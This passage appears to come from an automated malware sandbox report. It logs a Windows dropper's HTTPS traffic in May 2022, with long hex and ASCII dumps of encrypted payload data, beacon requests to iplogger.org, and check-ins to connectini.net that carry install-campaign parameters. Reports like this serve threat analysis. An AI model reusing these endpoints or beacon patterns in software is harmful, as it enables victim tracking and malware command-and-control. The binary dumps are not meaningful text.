b4 c3 c3 38 9b 5e 2e 59 25 d1 57 3c af a2 be f7 52 d6 3e f2 33 5d 0d 2e e6 ea c5 6c 43 98 96 af 37 3c 9d fd b0 ec
                                                                                                                          Data Ascii: w)c"EdKOmJ=J[aTgE%)YO*m~.2.9Nsp7[oh TfDg>PIsL}Y3/IU(D#sx|P,8hb&2aT@C]KFv:-<i8^.Y%W<R>3].lC7<
                                                                                                                          2022-05-21 07:32:44 UTC2211INData Raw: 1e 28 8c b7 3e 66 81 61 8c 97 22 d9 93 a4 5e ec 50 ed 8c c9 6c cb fc 01 fd 73 b1 1d bf df 12 07 a7 c7 43 47 44 fc 09 1f d3 ac a2 8b 3e ec a9 dd 66 6a 15 06 87 92 15 fd 8e 8e 6a 9d 47 48 aa e8 34 15 ac 3d be 5c 08 83 5c 9a 27 c3 d4 cd 01 42 3b fc c2 77 9d e1 77 75 bb af cb a6 f3 cd cb ad 55 78 4e a6 1f de 93 14 b9 ef 95 e2 9a 17 80 4b bd 7b 24 0e 7a f0 8a f2 8e 36 fb 2b 24 e0 fd 36 cc 86 ad 01 1c 23 6f 5e 92 02 0e cb 49 be e4 eb 20 6b d5 32 86 b9 c0 56 3d 20 46 f9 f4 c2 ce c8 4f 18 24 77 ef a8 83 2c 23 3c ee ad d8 fd c1 de be 69 e5 b8 fc d6 f8 1b 8a 95 37 88 e0 20 a7 b6 6c a0 79 1c c5 61 81 37 98 f1 d7 92 d4 95 8c 80 b7 44 3f 77 71 6e a1 59 81 68 c8 52 15 91 85 60 94 30 b0 ae fd c6 55 4d 3a e8 9a 84 c4 27 00 46 6a 94 e9 d2 33 fa 50 7e bb af f0 7c 29 62 e6
                                                                                                                          Data Ascii: (>fa"^PlsCGD>fjjGH4=\\'B;wwuUxNK{$z6+$6#o^I k2V= FO$w,#<i7 lya7D?wqnYhR`0UM:'Fj3P~|)b
                                                                                                                          2022-05-21 07:32:44 UTC2227INData Raw: af d2 1d d2 b3 24 90 4a c1 fc 67 b4 ae 86 53 1a 1c 46 ad a9 87 ec d8 56 b4 43 cf a5 25 ed 68 4d 1f 56 a3 aa 62 04 ae 01 71 b2 bf 16 9b 2f db 70 d5 b4 76 c6 ec bf 87 32 4f 92 9f e8 78 18 a1 e8 59 b1 82 c6 b2 ed e7 b2 57 b3 ce 72 12 d0 74 39 fd 8a 52 d2 d2 25 87 7c b5 df c3 19 f1 59 e0 78 d9 5d 95 d9 7a b1 85 87 36 28 34 5b 90 54 e4 77 28 56 7d 67 51 96 41 80 77 10 90 2d 2e d6 2a 3a fa 35 9d b0 c5 6d 5b e5 b0 3f 3d 31 0c 69 08 d0 43 00 e8 0c da f9 d7 98 51 6a 93 d5 16 49 9a ad de f5 3f ea 05 2c 6a 4d 23 b9 d0 a9 3a 20 e8 60 55 b8 3f 91 f8 1b 4c 46 e3 a4 33 4f b2 e5 ba 91 b9 cf 64 1e d4 58 27 c8 88 41 08 e0 e6 bc 89 b3 27 85 82 34 31 73 70 1d c1 92 43 e9 4d 59 e8 ad e8 f6 9e 53 12 db c5 68 c0 d3 75 65 86 78 a2 15 a2 86 86 20 b4 44 f3 23 4d 1f 07 5f 5c c6 9e
                                                                                                                          Data Ascii: $JgSFVC%hMVbq/pv2OxYWrt9R%|Yx]z6(4[Tw(V}gQAw-.*:5m[?=1iCQjI?,jM#: `U?LF3OdX'A'41spCMYShuex D#M_\
                                                                                                                          2022-05-21 07:32:44 UTC2243INData Raw: 40 3a 86 ba e1 4a 0a 34 72 a5 d1 63 ce be 75 97 c5 54 1e dc 50 59 10 a1 2c f9 4b 4a a1 52 1a c0 09 cd 4d e4 cc 9f f5 5a 71 42 7b db 4a 49 58 c2 b4 76 62 24 69 c7 4f 52 71 a3 25 45 45 be 8e cb a5 d4 2e f6 5b 11 15 d5 38 65 59 8c 82 27 b2 84 36 13 4f 49 1c ec 23 b3 7c 83 91 b5 7d f6 bb f9 b0 6f 6b ff a1 86 93 39 fd a9 ca 66 9b 86 b6 b0 b4 db 53 5a 74 8e c4 fd 70 f1 84 ef 07 bf fe 02 52 b8 ed 0b 3a 6e 9b 37 d6 00 d5 86 c8 08 64 08 86 d0 13 e8 ca fb 7d c0 94 78 f1 a4 48 34 df d4 36 b4 ff 9b 70 79 d7 97 b6 c6 ca 6a 50 03 8b 43 d7 27 1d c7 d5 7f 6f 58 f0 16 50 74 1e 75 ff a5 11 a4 82 9e 5f ee 8b d4 ef 7f ec d7 89 12 9e 48 b5 e9 84 7a 92 6a 1e af 1a 9e 6e c2 32 66 29 30 a9 ff c3 00 1a 8d e3 15 cc 15 a7 85 66 f4 cf 6d e4 e6 59 85 86 35 a2 09 7f da f4 2f 1e 40 fa
                                                                                                                          Data Ascii: @:J4rcuTPY,KJRMZqB{JIXvb$iORq%EE.[8eY'6OI#|}ok9fSZtpR:n7d}xH46pyjPC'oXPtu_Hzjn2f)0fmY5/@
                                                                                                                          2022-05-21 07:32:44 UTC2259INData Raw: 47 96 03 23 fe 65 d9 b6 a6 27 8a 41 5c 5f c3 8b 1e e0 1f 8d dd 67 b0 6f df bf 12 8a 18 d0 39 0a da 03 a6 eb d7 a4 eb db a1 61 9d a7 0b 3e 7b 54 a7 fd 74 01 0c 5f 12 90 72 df 3a cc f2 50 ac f7 57 a5 ff 4d 9d 67 fa 37 4c 81 82 a3 b4 c2 e5 ac dd 73 f0 0c 16 80 88 6a 0f 40 c3 0d 32 d2 0d 54 78 fe df 45 66 2b 5c d8 33 c1 2a b5 f7 d6 18 f1 ee 3e 03 a0 22 93 f5 f5 8c 95 b1 44 51 51 39 e0 b7 9b 40 9c 89 98 9a 84 ba 6e 68 ec 5d e3 59 b4 ea 15 3b 3c 5c 6f 59 3c 4d 75 de b4 af 5d a7 3b ef a8 9c ea 95 25 06 ca 85 c7 b3 92 4b a0 40 c3 af d8 6d 6e 95 54 8d bb b7 75 7b 5c e6 ca 49 2d 9a a6 33 5a f8 72 db c5 41 e8 d4 22 2a 48 61 f9 dc 57 3f 5e 28 c0 65 c3 43 f9 01 36 7e 24 33 31 f3 03 fc 48 fa 5a ae 06 0f 24 c1 40 04 63 0d 2e a7 a6 3c f0 cb e4 41 05 0b 08 a5 a6 45 46 84
                                                                                                                          Data Ascii: G#e'A\_go9a>{Tt_r:PWMg7Lsj@2TxEf+\3*>"DQQ9@nh]Y;<\oY<Mu];%K@mnTu{\I-3ZrA"*HaW?^(eC6~$31HZ$@c.<AEF
                                                                                                                          2022-05-21 07:32:44 UTC2275INData Raw: e7 e3 3d 61 97 7e 51 d1 ab eb 6b 6f f3 1d 93 71 0b 23 2f 74 e5 fa 0f b8 e7 9a fe 67 2d bc 65 7e eb a9 8a e4 51 f1 ae 7b f5 ed 50 55 5d 7b c4 af 69 cb c4 d3 29 95 59 df 34 8f fc 0b 58 44 bf 23 fe 46 87 af 6e 51 6e f7 cd 76 33 17 79 a0 ae 88 2b 50 80 d0 c5 d5 84 21 3c b5 5c c4 03 78 4d 82 e5 d0 e9 1c a5 b8 ea 5c 5a d7 ee 1a 33 59 fe 81 fa fe ea bb 59 b8 fb 04 0c d1 2e c5 42 c2 96 ce 5c 22 41 64 6d a0 f7 72 9f f0 57 38 6c a3 4c 4d 63 dc 74 2a 2c fc fd 95 1a 7b 71 d0 c0 cf d6 53 29 c3 06 30 1e 39 9a 00 37 1a d0 f5 d5 33 0f 4e 49 c7 2a 43 e9 d9 86 ad 51 87 e5 08 cd 95 8b c5 e7 c4 a0 91 2f 8b fa 1d 58 56 44 70 8c 4c 68 9a ba 71 e4 1c 57 68 40 b7 57 aa ee b4 89 34 3f 60 6c 1d 4c 52 54 ba 7b 5a b6 83 44 57 b7 00 2b 7b 6e ca 97 6d 5a dc 94 72 50 7b af f4 62 d2 1b
                                                                                                                          Data Ascii: =a~Qkoq#/tg-e~Q{PU]{i)Y4XD#FnQnv3y+P!<\xM\Z3YY.B\"AdmrW8lLMct*,{qS)0973NI*CQ/XVDpLhqWh@W4?`lLRT{ZDW+{nmZrP{b
                                                                                                                          2022-05-21 07:32:44 UTC2291INData Raw: cf 93 9a 87 4a 49 5d 63 36 42 ae c7 2b 09 da 23 12 b9 c9 9b 37 e2 97 e7 51 e2 69 6f 71 22 dc 50 ad ee 10 7a 5c 31 34 97 4c 3d 1f 43 3f ec 00 93 c7 74 ff 08 6a 21 8a c4 b4 1d d2 c1 9d 1d b2 bc 1e 3e c3 e2 d2 da c1 52 4d 55 8b c8 c7 d0 56 72 a2 ec 06 91 12 2b 61 98 b3 ba f5 f7 c5 57 03 64 28 d3 3f 92 70 e2 5f bd 56 e2 36 3e c2 04 ad 30 18 9c 2c e3 3b b7 40 08 38 0d 87 bc 5f c4 bd 51 c0 f1 47 0d 70 64 40 0b 28 e2 f9 58 b3 ec 66 f3 59 a5 a7 0f 6a 0d 8d 88 cd 41 23 89 2a 93 81 ad 55 d6 fb b1 ce 17 03 d9 79 2f 66 c9 6b 27 42 18 15 08 fa ba c3 e0 a5 6f fc c9 16 79 df 18 71 2c a8 3c 31 03 40 04 90 17 60 ec c1 21 68 29 49 51 67 8e 14 b5 90 73 7e c2 6b 20 7b b8 72 56 9b 1b a3 7a 7e ab 13 f7 e4 d4 06 71 d0 92 05 2f d8 a2 43 a3 9c b4 63 d9 96 1e 66 77 e0 a3 de d1 e6
                                                                                                                          Data Ascii: JI]c6B+#7Qioq"Pz\14L=C?tj!>RMUVr+aWd(?p_V6>0,;@8_QGpd@(XfYjA#*Uy/fk'Boyq,<1@`!h)IQgs~k {rVz~q/Ccfw
                                                                                                                          2022-05-21 07:32:44 UTC2307INData Raw: 7a 69 e2 2d e4 5f 06 c8 d8 6a 0c 3a 94 5e 9a b0 2f f0 5c 4b 7b 5c 7f 53 1c dc 9f 76 3d d5 9d 7d 75 13 fc ff 68 be 9c c4 04 12 8a b2 54 39 6e dd 8c 75 17 b0 9c 1f 1b 38 2a cb 3e 0c 1d dc 22 49 3a 08 8f aa cd 59 2d f0 fc b3 dd 28 d3 41 22 4d 7f 37 43 05 5f c2 1f fc c8 e6 e5 18 3e bd 31 8e e2 09 2f 94 35 87 ac 84 17 2e 3f 70 86 a7 91 8d 5d c9 12 38 e0 fb fd 66 89 8c eb 33 10 3a 28 0e 85 3e f7 4e 86 1e cc 33 2b 15 b1 ca db 85 ad cb d0 dc 09 ef a8 44 8d 94 50 e6 9f 07 66 4a b8 04 81 a9 9d 6f f6 85 92 5f 0d 7f c8 68 79 19 e1 f9 e4 1c 09 c8 da 46 39 db ef 8f 51 ed ac 16 ed ed 80 d5 08 05 f7 5d 62 dd 25 74 a8 8c 39 64 01 11 85 29 33 06 c5 fb f0 bc fe 28 0f 12 fa ea e6 11 b4 72 12 9b f5 c7 ee e9 e1 56 82 13 83 fc f3 69 be f7 07 68 80 52 77 2e 87 95 4e 7a eb 40 22
                                                                                                                          Data Ascii: zi-_j:^/\K{\Sv=}uhT9nu8*>"I:Y-(A"M7C_>1/5.?p]8f3:(>N3+DPfJo_hyF9Q]b%t9d)3(rVihRw.Nz@"
                                                                                                                          2022-05-21 07:32:44 UTC2323INData Raw: 6c 00 36 45 e1 1a 97 c9 34 51 e4 55 10 5d a3 f1 89 51 66 a4 57 53 67 4e c2 bb d0 38 16 89 2c fe 76 f5 05 fc 08 d8 71 a5 47 01 42 7c ad ad 9f de d3 b5 39 b9 16 f4 7b f5 31 ba f6 27 1e 55 1f 6a c8 9d 13 4d 0f e3 4d c8 35 7c 4d 21 bd 56 f0 9e 08 a6 96 6e f0 9b 14 7c e7 09 13 5d 62 f0 4a 93 94 74 30 bd 53 e7 42 e8 fa 98 1d 29 c2 8c 17 69 76 86 01 68 fc 5c c3 bb bf 17 4f b1 72 55 e3 3f 02 cd 4d 6d 1b d2 7a c6 1b c0 10 cd eb be 04 d9 e5 fb 98 eb c6 56 69 e8 4e 3d 4c 80 a1 9c 1b 76 b7 fa 9c f5 44 ae c9 97 74 d5 ac 4b a8 8a 4e 3d 38 c8 d0 1c 33 cb ac e7 e0 a0 29 d6 ff ab 4e 6a 44 ed 03 dc a4 29 7d 6f ed d8 9e 9a 60 f3 03 c3 e1 07 44 57 82 fc ac 35 a8 12 cf 0a 33 8d a1 5b b5 44 7c ab 74 7b 41 9c b7 12 ed b3 93 db df e7 95 95 6b e6 d7 02 8c 76 a4 a2 16 80 68 7f 16
                                                                                                                          Data Ascii: l6E4QU]QfWSgN8,vqGB|9{1'UjMM5|M!Vn|]bJt0SB)ivh\OrU?MmzViN=LvDtKN=83)NjD)}o`DW53[D|t{Akvh
                                                                                                                          2022-05-21 07:32:44 UTC2339INData Raw: 1d 16 b2 d0 d4 17 58 b0 f5 5b de bf 27 c8 35 3c b5 39 04 80 01 51 77 14 af aa 1a ba b5 77 c4 6f de 2c 9d f9 8f c5 10 2e 3e a5 05 20 71 ad 5b 0d bb d7 01 e2 60 cb a9 06 2f 84 80 7e 1d 1e d9 76 ca 7b e3 db 93 c5 c4 6f e4 d9 6f 95 3d 25 ac f8 c6 a6 2f ed 8c e9 9e 1f 4f 31 89 76 78 be 5c f9 2a 31 68 ae 57 5f bd cb 7e 6c ac 2d a5 22 08 81 a5 23 df 88 4f 49 f9 c3 72 ed 5f 82 2f 97 c3 a1 66 04 04 3e 9c ae 4e ae 39 95 8b 25 ee 9f 3e 17 a2 7c 98 9d ae 13 cf 9c 38 b4 d2 be 07 34 42 7c 85 f5 eb 34 74 b0 e2 e4 d6 e2 42 a1 85 02 7a 61 c2 71 46 da 34 61 6d ba 5e 99 36 87 86 ca 4e f1 b3 9e 94 5f 89 8c c4 49 9e 1b fe 16 bf 76 23 49 ab b0 47 75 b8 6c ee 55 07 3e 22 dc a8 07 dc 58 60 47 af 8d 0d 41 f8 4f 53 b7 bc 33 81 ac 67 c6 63 ab d5 15 83 fe d5 7c d6 3f 75 5e c4 8d 9b
                                                                                                                          Data Ascii: X['5<9Qwwo,.> q[`/~v{oo=%/O1vx\*1hW_~l-"#OIr_/f>N9%>|84B|4tBzaqF4am^6N_Iv#IGulU>"X`GAOS3gc|?u^
                                                                                                                          2022-05-21 07:32:44 UTC2355INData Raw: e6 59 d8 34 2d cd 2d d2 b4 fb 7e 1e 0b fc 8a b6 f1 42 48 11 c6 32 0d dd 85 8b b6 d9 80 1a f6 b5 b5 8f 69 45 bd 73 45 22 53 20 32 77 7f ec 34 50 e8 79 38 db 6b 48 51 22 f0 8d d0 87 82 e9 fe 17 d9 7a 56 cf ca 17 de 88 a4 21 df e9 1e a6 19 4e 71 31 46 af 31 fc 2a d4 7b 1b 1e a8 60 e1 15 f4 43 39 e0 0d 30 1a 25 5e ac 27 ad f2 3e 37 66 1e bc 47 3a b8 cf 61 6c 6a 3d be 49 09 31 9a 29 e5 eb bb e8 93 0b d2 9d 71 41 45 57 58 62 de b1 01 15 a1 3b da 0a 19 e4 e0 d8 d5 89 bb d4 21 13 aa e1 8d dd 5c fd 91 09 45 c5 19 4e fc 4b 2a f3 21 bb 31 62 e5 88 a2 2a 78 e3 5e d6 1c 23 59 a4 65 f5 50 a4 ee f2 65 5e 70 d4 ce 48 bd 47 c4 bf ca c1 57 4d f5 6e 53 1e 61 76 93 f5 82 80 cb 3b f7 74 5b 4e 2b 33 2c 8d af 50 ee 89 a9 78 e1 4d a4 07 c1 ee e9 7a 9b 44 85 c9 ff 8d ab e6 f9 88
                                                                                                                          Data Ascii: Y4--~BH2iEsE"S 2w4Py8kHQ"zV!Nq1F1*{`C90%^'>7fG:alj=I1)qAEWXb;!\ENK*!1b*x^#YePe^pHGWMnSav;t[N+3,PxMzD
                                                                                                                          2022-05-21 07:32:44 UTC2371INData Raw: 27 3a 5a 9c f2 83 06 d7 9c 6c b7 1b 9f 51 a7 6c 11 c2 22 94 5c 20 97 55 5e b1 b4 d9 62 e2 85 a5 34 61 a5 01 65 c9 f9 05 b4 da 6e f7 d6 a2 f8 76 f1 04 41 db fc f3 d3 f1 8f b0 19 87 b7 ce b3 07 6a 7e 8f 47 2b 1d 40 82 48 e8 4c fd fc 7f 4b 0f e8 6a 1f 4b e6 a9 5e bf ee eb e4 dc e2 23 66 cd 97 4b 86 ef 5e b9 21 9a e6 b5 19 d0 10 3a ad 07 eb 2d c0 a8 30 d9 f1 da 43 33 34 f7 5f 51 7e 9e fd a6 dd c8 f1 56 7c b6 d5 ff 61 40 1b d3 8a 92 f7 97 0b 56 dd 10 2f 4f bd e9 af 6d 00 af 31 48 d6 73 e7 3f 62 b1 b2 fa 80 f1 a5 39 28 6c 4f b0 7d 88 0e b6 49 93 2c 3a d6 f8 aa b6 ef ce f3 7d 0a 8b 89 62 3e 6d f6 70 aa cd 84 0f b0 8f e1 5a e8 f8 dd 3c ce 5c bd ca 51 cb b6 42 e8 94 b6 6b 7b 42 cd 4c 2d 44 63 b0 22 cd 38 49 30 06 96 99 6a a5 ed 9a 45 f0 ee 5b fd 1a a3 23 c4 5d 4a
                                                                                                                          Data Ascii: ':ZlQl"\ U^b4aenvAj~G+@HLKjK^#fK^!:-0C34_Q~V|a@V/Om1Hs?b9(lO}I,:}b>mpZ<\QBk{BL-Dc"8I0jE[#]J
                                                                                                                          2022-05-21 07:32:44 UTC2387INData Raw: 4e b0 92 ee e3 f6 36 4e ac 90 ef 66 c4 0b 7e 3c 1a 96 14 65 87 1d ff 8b 7d 44 f7 90 65 74 27 8c 2b ba 2a 1b 66 c4 3d 66 14 59 aa cc fc af 98 23 b8 ed aa 7f cf 19 dd ca 59 86 c9 27 a6 dd cb 4c bd 4f 58 d9 bf 5a a3 bd 82 fb 0b 6b 62 d0 a1 9a 3c 21 0e 9d 40 5d 5c b9 eb c9 01 39 73 6e e3 3f d2 31 c8 fb 9a 86 00 2e 91 7c a8 b3 79 35 27 c5 3b 52 40 89 90 a6 9c 93 28 e2 e8 00 0d b4 ed e5 7c 78 3b a3 c1 9d 71 64 ed bc b3 f8 a3 cb a7 e4 5b 7d 5e 0b 35 83 f0 e8 1e 86 3d cb 21 90 89 dd 97 27 07 c3 4e 90 de e0 8e 7e 7e 56 ba b4 14 fd d6 6d 41 9e 9a 3e 2b 34 6c dc 86 b0 94 aa d6 11 11 dc 0b c1 22 f0 f0 58 e0 17 c5 95 eb 4d 35 0c dc 71 5b 0f ba 73 0c 0e 55 c5 72 e3 8a a6 ad 9b c5 1d 64 3a b4 17 ef 80 ed 40 54 a6 ab 4a ef 59 d9 c6 8d 5b 6d 38 14 16 c7 a3 2c 7f 2b b2 02
                                                                                                                          Data Ascii: N6Nf~<e}Det'+*f=fY#Y'LOXZkb<!@]\9sn?1.|y5';R@(|x;qd[}^5=!'N~~VmA>+4l"XM5q[sUrd:@TJY[m8,+


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          12192.168.2.44981537.230.138.123443
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          2022-05-21 07:32:43 UTC1556OUTGET /Series/configPoduct/2/goodchannel.json HTTP/1.1
                                                                                                                          Host: connectini.net
                                                                                                                          2022-05-21 07:32:43 UTC1556INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Sat, 21 May 2022 07:32:43 GMT
                                                                                                                          Content-Type: application/json
                                                                                                                          Content-Length: 344
                                                                                                                          Connection: close
                                                                                                                          X-Accel-Version: 0.01
                                                                                                                          Last-Modified: Mon, 11 Apr 2022 13:48:37 GMT
                                                                                                                          ETag: "158-5dc613383b411"
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          X-Powered-By: PleskLin
                                                                                                                          2022-05-21 07:32:43 UTC1556INData Raw: 2f 64 49 78 42 68 51 44 64 4d 75 47 74 72 41 42 4a 79 68 4c 50 4c 63 38 2f 62 75 50 35 77 6c 2b 78 4b 55 62 57 55 47 30 6f 77 38 53 46 30 38 74 46 64 51 5a 66 41 39 41 49 6b 45 54 67 30 7a 4c 52 67 34 6c 45 36 63 6d 6b 55 47 4e 47 35 71 76 34 4d 6e 45 63 7a 42 58 58 53 4e 67 78 39 58 55 46 66 62 45 71 42 2b 65 38 54 35 72 71 7a 62 64 76 55 51 4d 44 47 2f 77 32 69 48 78 41 62 55 73 59 5a 65 37 6a 6e 4a 32 54 70 4b 73 59 44 54 64 42 6b 75 61 6f 6a 78 69 58 69 68 6d 4b 32 6d 4c 58 74 45 74 67 54 73 6d 71 6c 38 53 7a 32 4d 46 7a 77 57 37 70 54 38 79 55 74 50 43 69 71 42 5a 56 52 69 46 79 70 65 4c 72 6d 72 48 45 71 51 38 69 78 4f 2f 6b 4f 43 75 34 6a 62 5a 2f 37 52 32 57 54 63 6f 71 55 30 32 35 2f 4d 45 33 33 2b 53 71 6d 70 30 35 48 5a 63 42 71 51 63 6f 58 34
                                                                                                                          Data Ascii: /dIxBhQDdMuGtrABJyhLPLc8/buP5wl+xKUbWUG0ow8SF08tFdQZfA9AIkETg0zLRg4lE6cmkUGNG5qv4MnEczBXXSNgx9XUFfbEqB+e8T5rqzbdvUQMDG/w2iHxAbUsYZe7jnJ2TpKsYDTdBkuaojxiXihmK2mLXtEtgTsmql8Sz2MFzwW7pT8yUtPCiqBZVRiFypeLrmrHEqQ8ixO/kOCu4jbZ/7R2WTcoqU025/ME33+Sqmp05HZcBqQcoX4


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          13192.168.2.44981737.230.138.123443
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          2022-05-21 07:32:44 UTC2396OUTGET /ip/check.php?duplicate=kenpachi2_non-search_goodchannel_installrox2_EbookReader HTTP/1.1
                                                                                                                          Host: connectini.net
                                                                                                                          2022-05-21 07:32:44 UTC2396INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Sat, 21 May 2022 07:32:44 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          X-Powered-By: PHP/7.1.33
                                                                                                                          X-Powered-By: PleskLin
                                                                                                                          2022-05-21 07:32:44 UTC2396INData Raw: 34 0d 0a 74 72 75 65 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 4true0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          14192.168.2.449821148.251.234.83443C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exe
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          2022-05-21 07:32:45 UTC2396OUTGET /1Nayx7 HTTP/1.1
                                                                                                                          Host: iplogger.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          2022-05-21 07:32:45 UTC2396INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Sat, 21 May 2022 07:32:45 GMT
                                                                                                                          Content-Type: image/png
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Set-Cookie: clhf03028ja=84.17.52.19; expires=Sun, 21-May-2023 07:32:45 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
                                                                                                                          Set-Cookie: 362769311410413587=3; expires=Sun, 21-May-2023 07:32:45 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
                                                                                                                          Expires: Sat, 21 May 2022 07:32:45 +0000
                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          2022-05-21 07:32:45 UTC2397INData Raw: 31 32 31 0d 0a 0a 4e 6f 74 69 63 65 3a 20 55 6e 64 65 66 69 6e 65 64 20 69 6e 64 65 78 3a 20 48 54 54 50 5f 55 53 45 52 5f 41 47 45 4e 54 20 69 6e 20 2f 68 6f 6d 65 2f 77 77 77 2f 6c 6f 67 67 65 72 73 2f 69 6e 64 65 78 2e 70 68 70 20 6f 6e 20 6c 69 6e 65 20 31 30 0a 0a 4e 6f 74 69 63 65 3a 20 55 6e 64 65 66 69 6e 65 64 20 69 6e 64 65 78 3a 20 48 54 54 50 5f 41 43 43 45 50 54 5f 4c 41 4e 47 55 41 47 45 20 69 6e 20 2f 68 6f 6d 65 2f 77 77 77 2f 6c 6f 67 67 65 72 73 2f 69 6e 64 65 78 2e 70 68 70 20 6f 6e 20 6c 69 6e 65 20 31 36 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 03 50 4c 54 45 00 00 00 a7 7a 3d da 00 00 00 01 74 52 4e 53 00 40 e6 d8 66 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4
                                                                                                                          Data Ascii: 121Notice: Undefined index: HTTP_USER_AGENT in /home/www/loggers/index.php on line 10Notice: Undefined index: HTTP_ACCEPT_LANGUAGE in /home/www/loggers/index.php on line 16PNGIHDR%VPLTEz=tRNS@fpHYs


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          15192.168.2.44982537.230.138.123443
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          2022-05-21 07:32:46 UTC2397OUTGET /ip/check.php?duplicate=kenpachi2_registry_goodchannel_AdxpertMedia_IbottaIOS HTTP/1.1
                                                                                                                          Host: connectini.net
                                                                                                                          2022-05-21 07:32:46 UTC2397INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Sat, 21 May 2022 07:32:46 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          X-Powered-By: PHP/7.1.33
                                                                                                                          X-Powered-By: PleskLin
                                                                                                                          2022-05-21 07:32:46 UTC2397INData Raw: 34 0d 0a 74 72 75 65 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 4true0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          16192.168.2.44983237.230.138.123443
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          2022-05-21 07:32:48 UTC2397OUTGET /S2S/Disc/Disc.php?ezok=pwoffch2&tesla=7 HTTP/1.1
                                                                                                                          Host: connectini.net
                                                                                                                          2022-05-21 07:32:48 UTC2397INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Sat, 21 May 2022 07:32:48 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          X-Powered-By: PHP/7.1.33
                                                                                                                          X-Powered-By: PleskLin
                                                                                                                          2022-05-21 07:32:48 UTC2398INData Raw: 35 0d 0a 46 61 6c 73 65 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 5False0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          17192.168.2.449833148.251.234.83443C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exe
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          2022-05-21 07:32:48 UTC2398OUTGET /1Rqjs7 HTTP/1.1
                                                                                                                          Host: iplogger.org
                                                                                                                          2022-05-21 07:32:48 UTC2398INHTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Sat, 21 May 2022 07:32:48 GMT
                                                                                                                          Content-Type: image/png
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Set-Cookie: clhf03028ja=84.17.52.19; expires=Sun, 21-May-2023 07:32:48 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
                                                                                                                          Set-Cookie: 310713011410413587=3; expires=Sun, 21-May-2023 07:32:48 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
                                                                                                                          Expires: Sat, 21 May 2022 07:32:48 +0000
                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          2022-05-21 07:32:48 UTC2398INData Raw: 31 32 31 0d 0a 0a 4e 6f 74 69 63 65 3a 20 55 6e 64 65 66 69 6e 65 64 20 69 6e 64 65 78 3a 20 48 54 54 50 5f 55 53 45 52 5f 41 47 45 4e 54 20 69 6e 20 2f 68 6f 6d 65 2f 77 77 77 2f 6c 6f 67 67 65 72 73 2f 69 6e 64 65 78 2e 70 68 70 20 6f 6e 20 6c 69 6e 65 20 31 30 0a 0a 4e 6f 74 69 63 65 3a 20 55 6e 64 65 66 69 6e 65 64 20 69 6e 64 65 78 3a 20 48 54 54 50 5f 41 43 43 45 50 54 5f 4c 41 4e 47 55 41 47 45 20 69 6e 20 2f 68 6f 6d 65 2f 77 77 77 2f 6c 6f 67 67 65 72 73 2f 69 6e 64 65 78 2e 70 68 70 20 6f 6e 20 6c 69 6e 65 20 31 36 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 03 50 4c 54 45 00 00 00 a7 7a 3d da 00 00 00 01 74 52 4e 53 00 40 e6 d8 66 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4
                                                                                                                          Data Ascii: 121Notice: Undefined index: HTTP_USER_AGENT in /home/www/loggers/index.php on line 10Notice: Undefined index: HTTP_ACCEPT_LANGUAGE in /home/www/loggers/index.php on line 16PNGIHDR%VPLTEz=tRNS@fpHYs


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          18192.168.2.449837148.251.234.83443C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exe
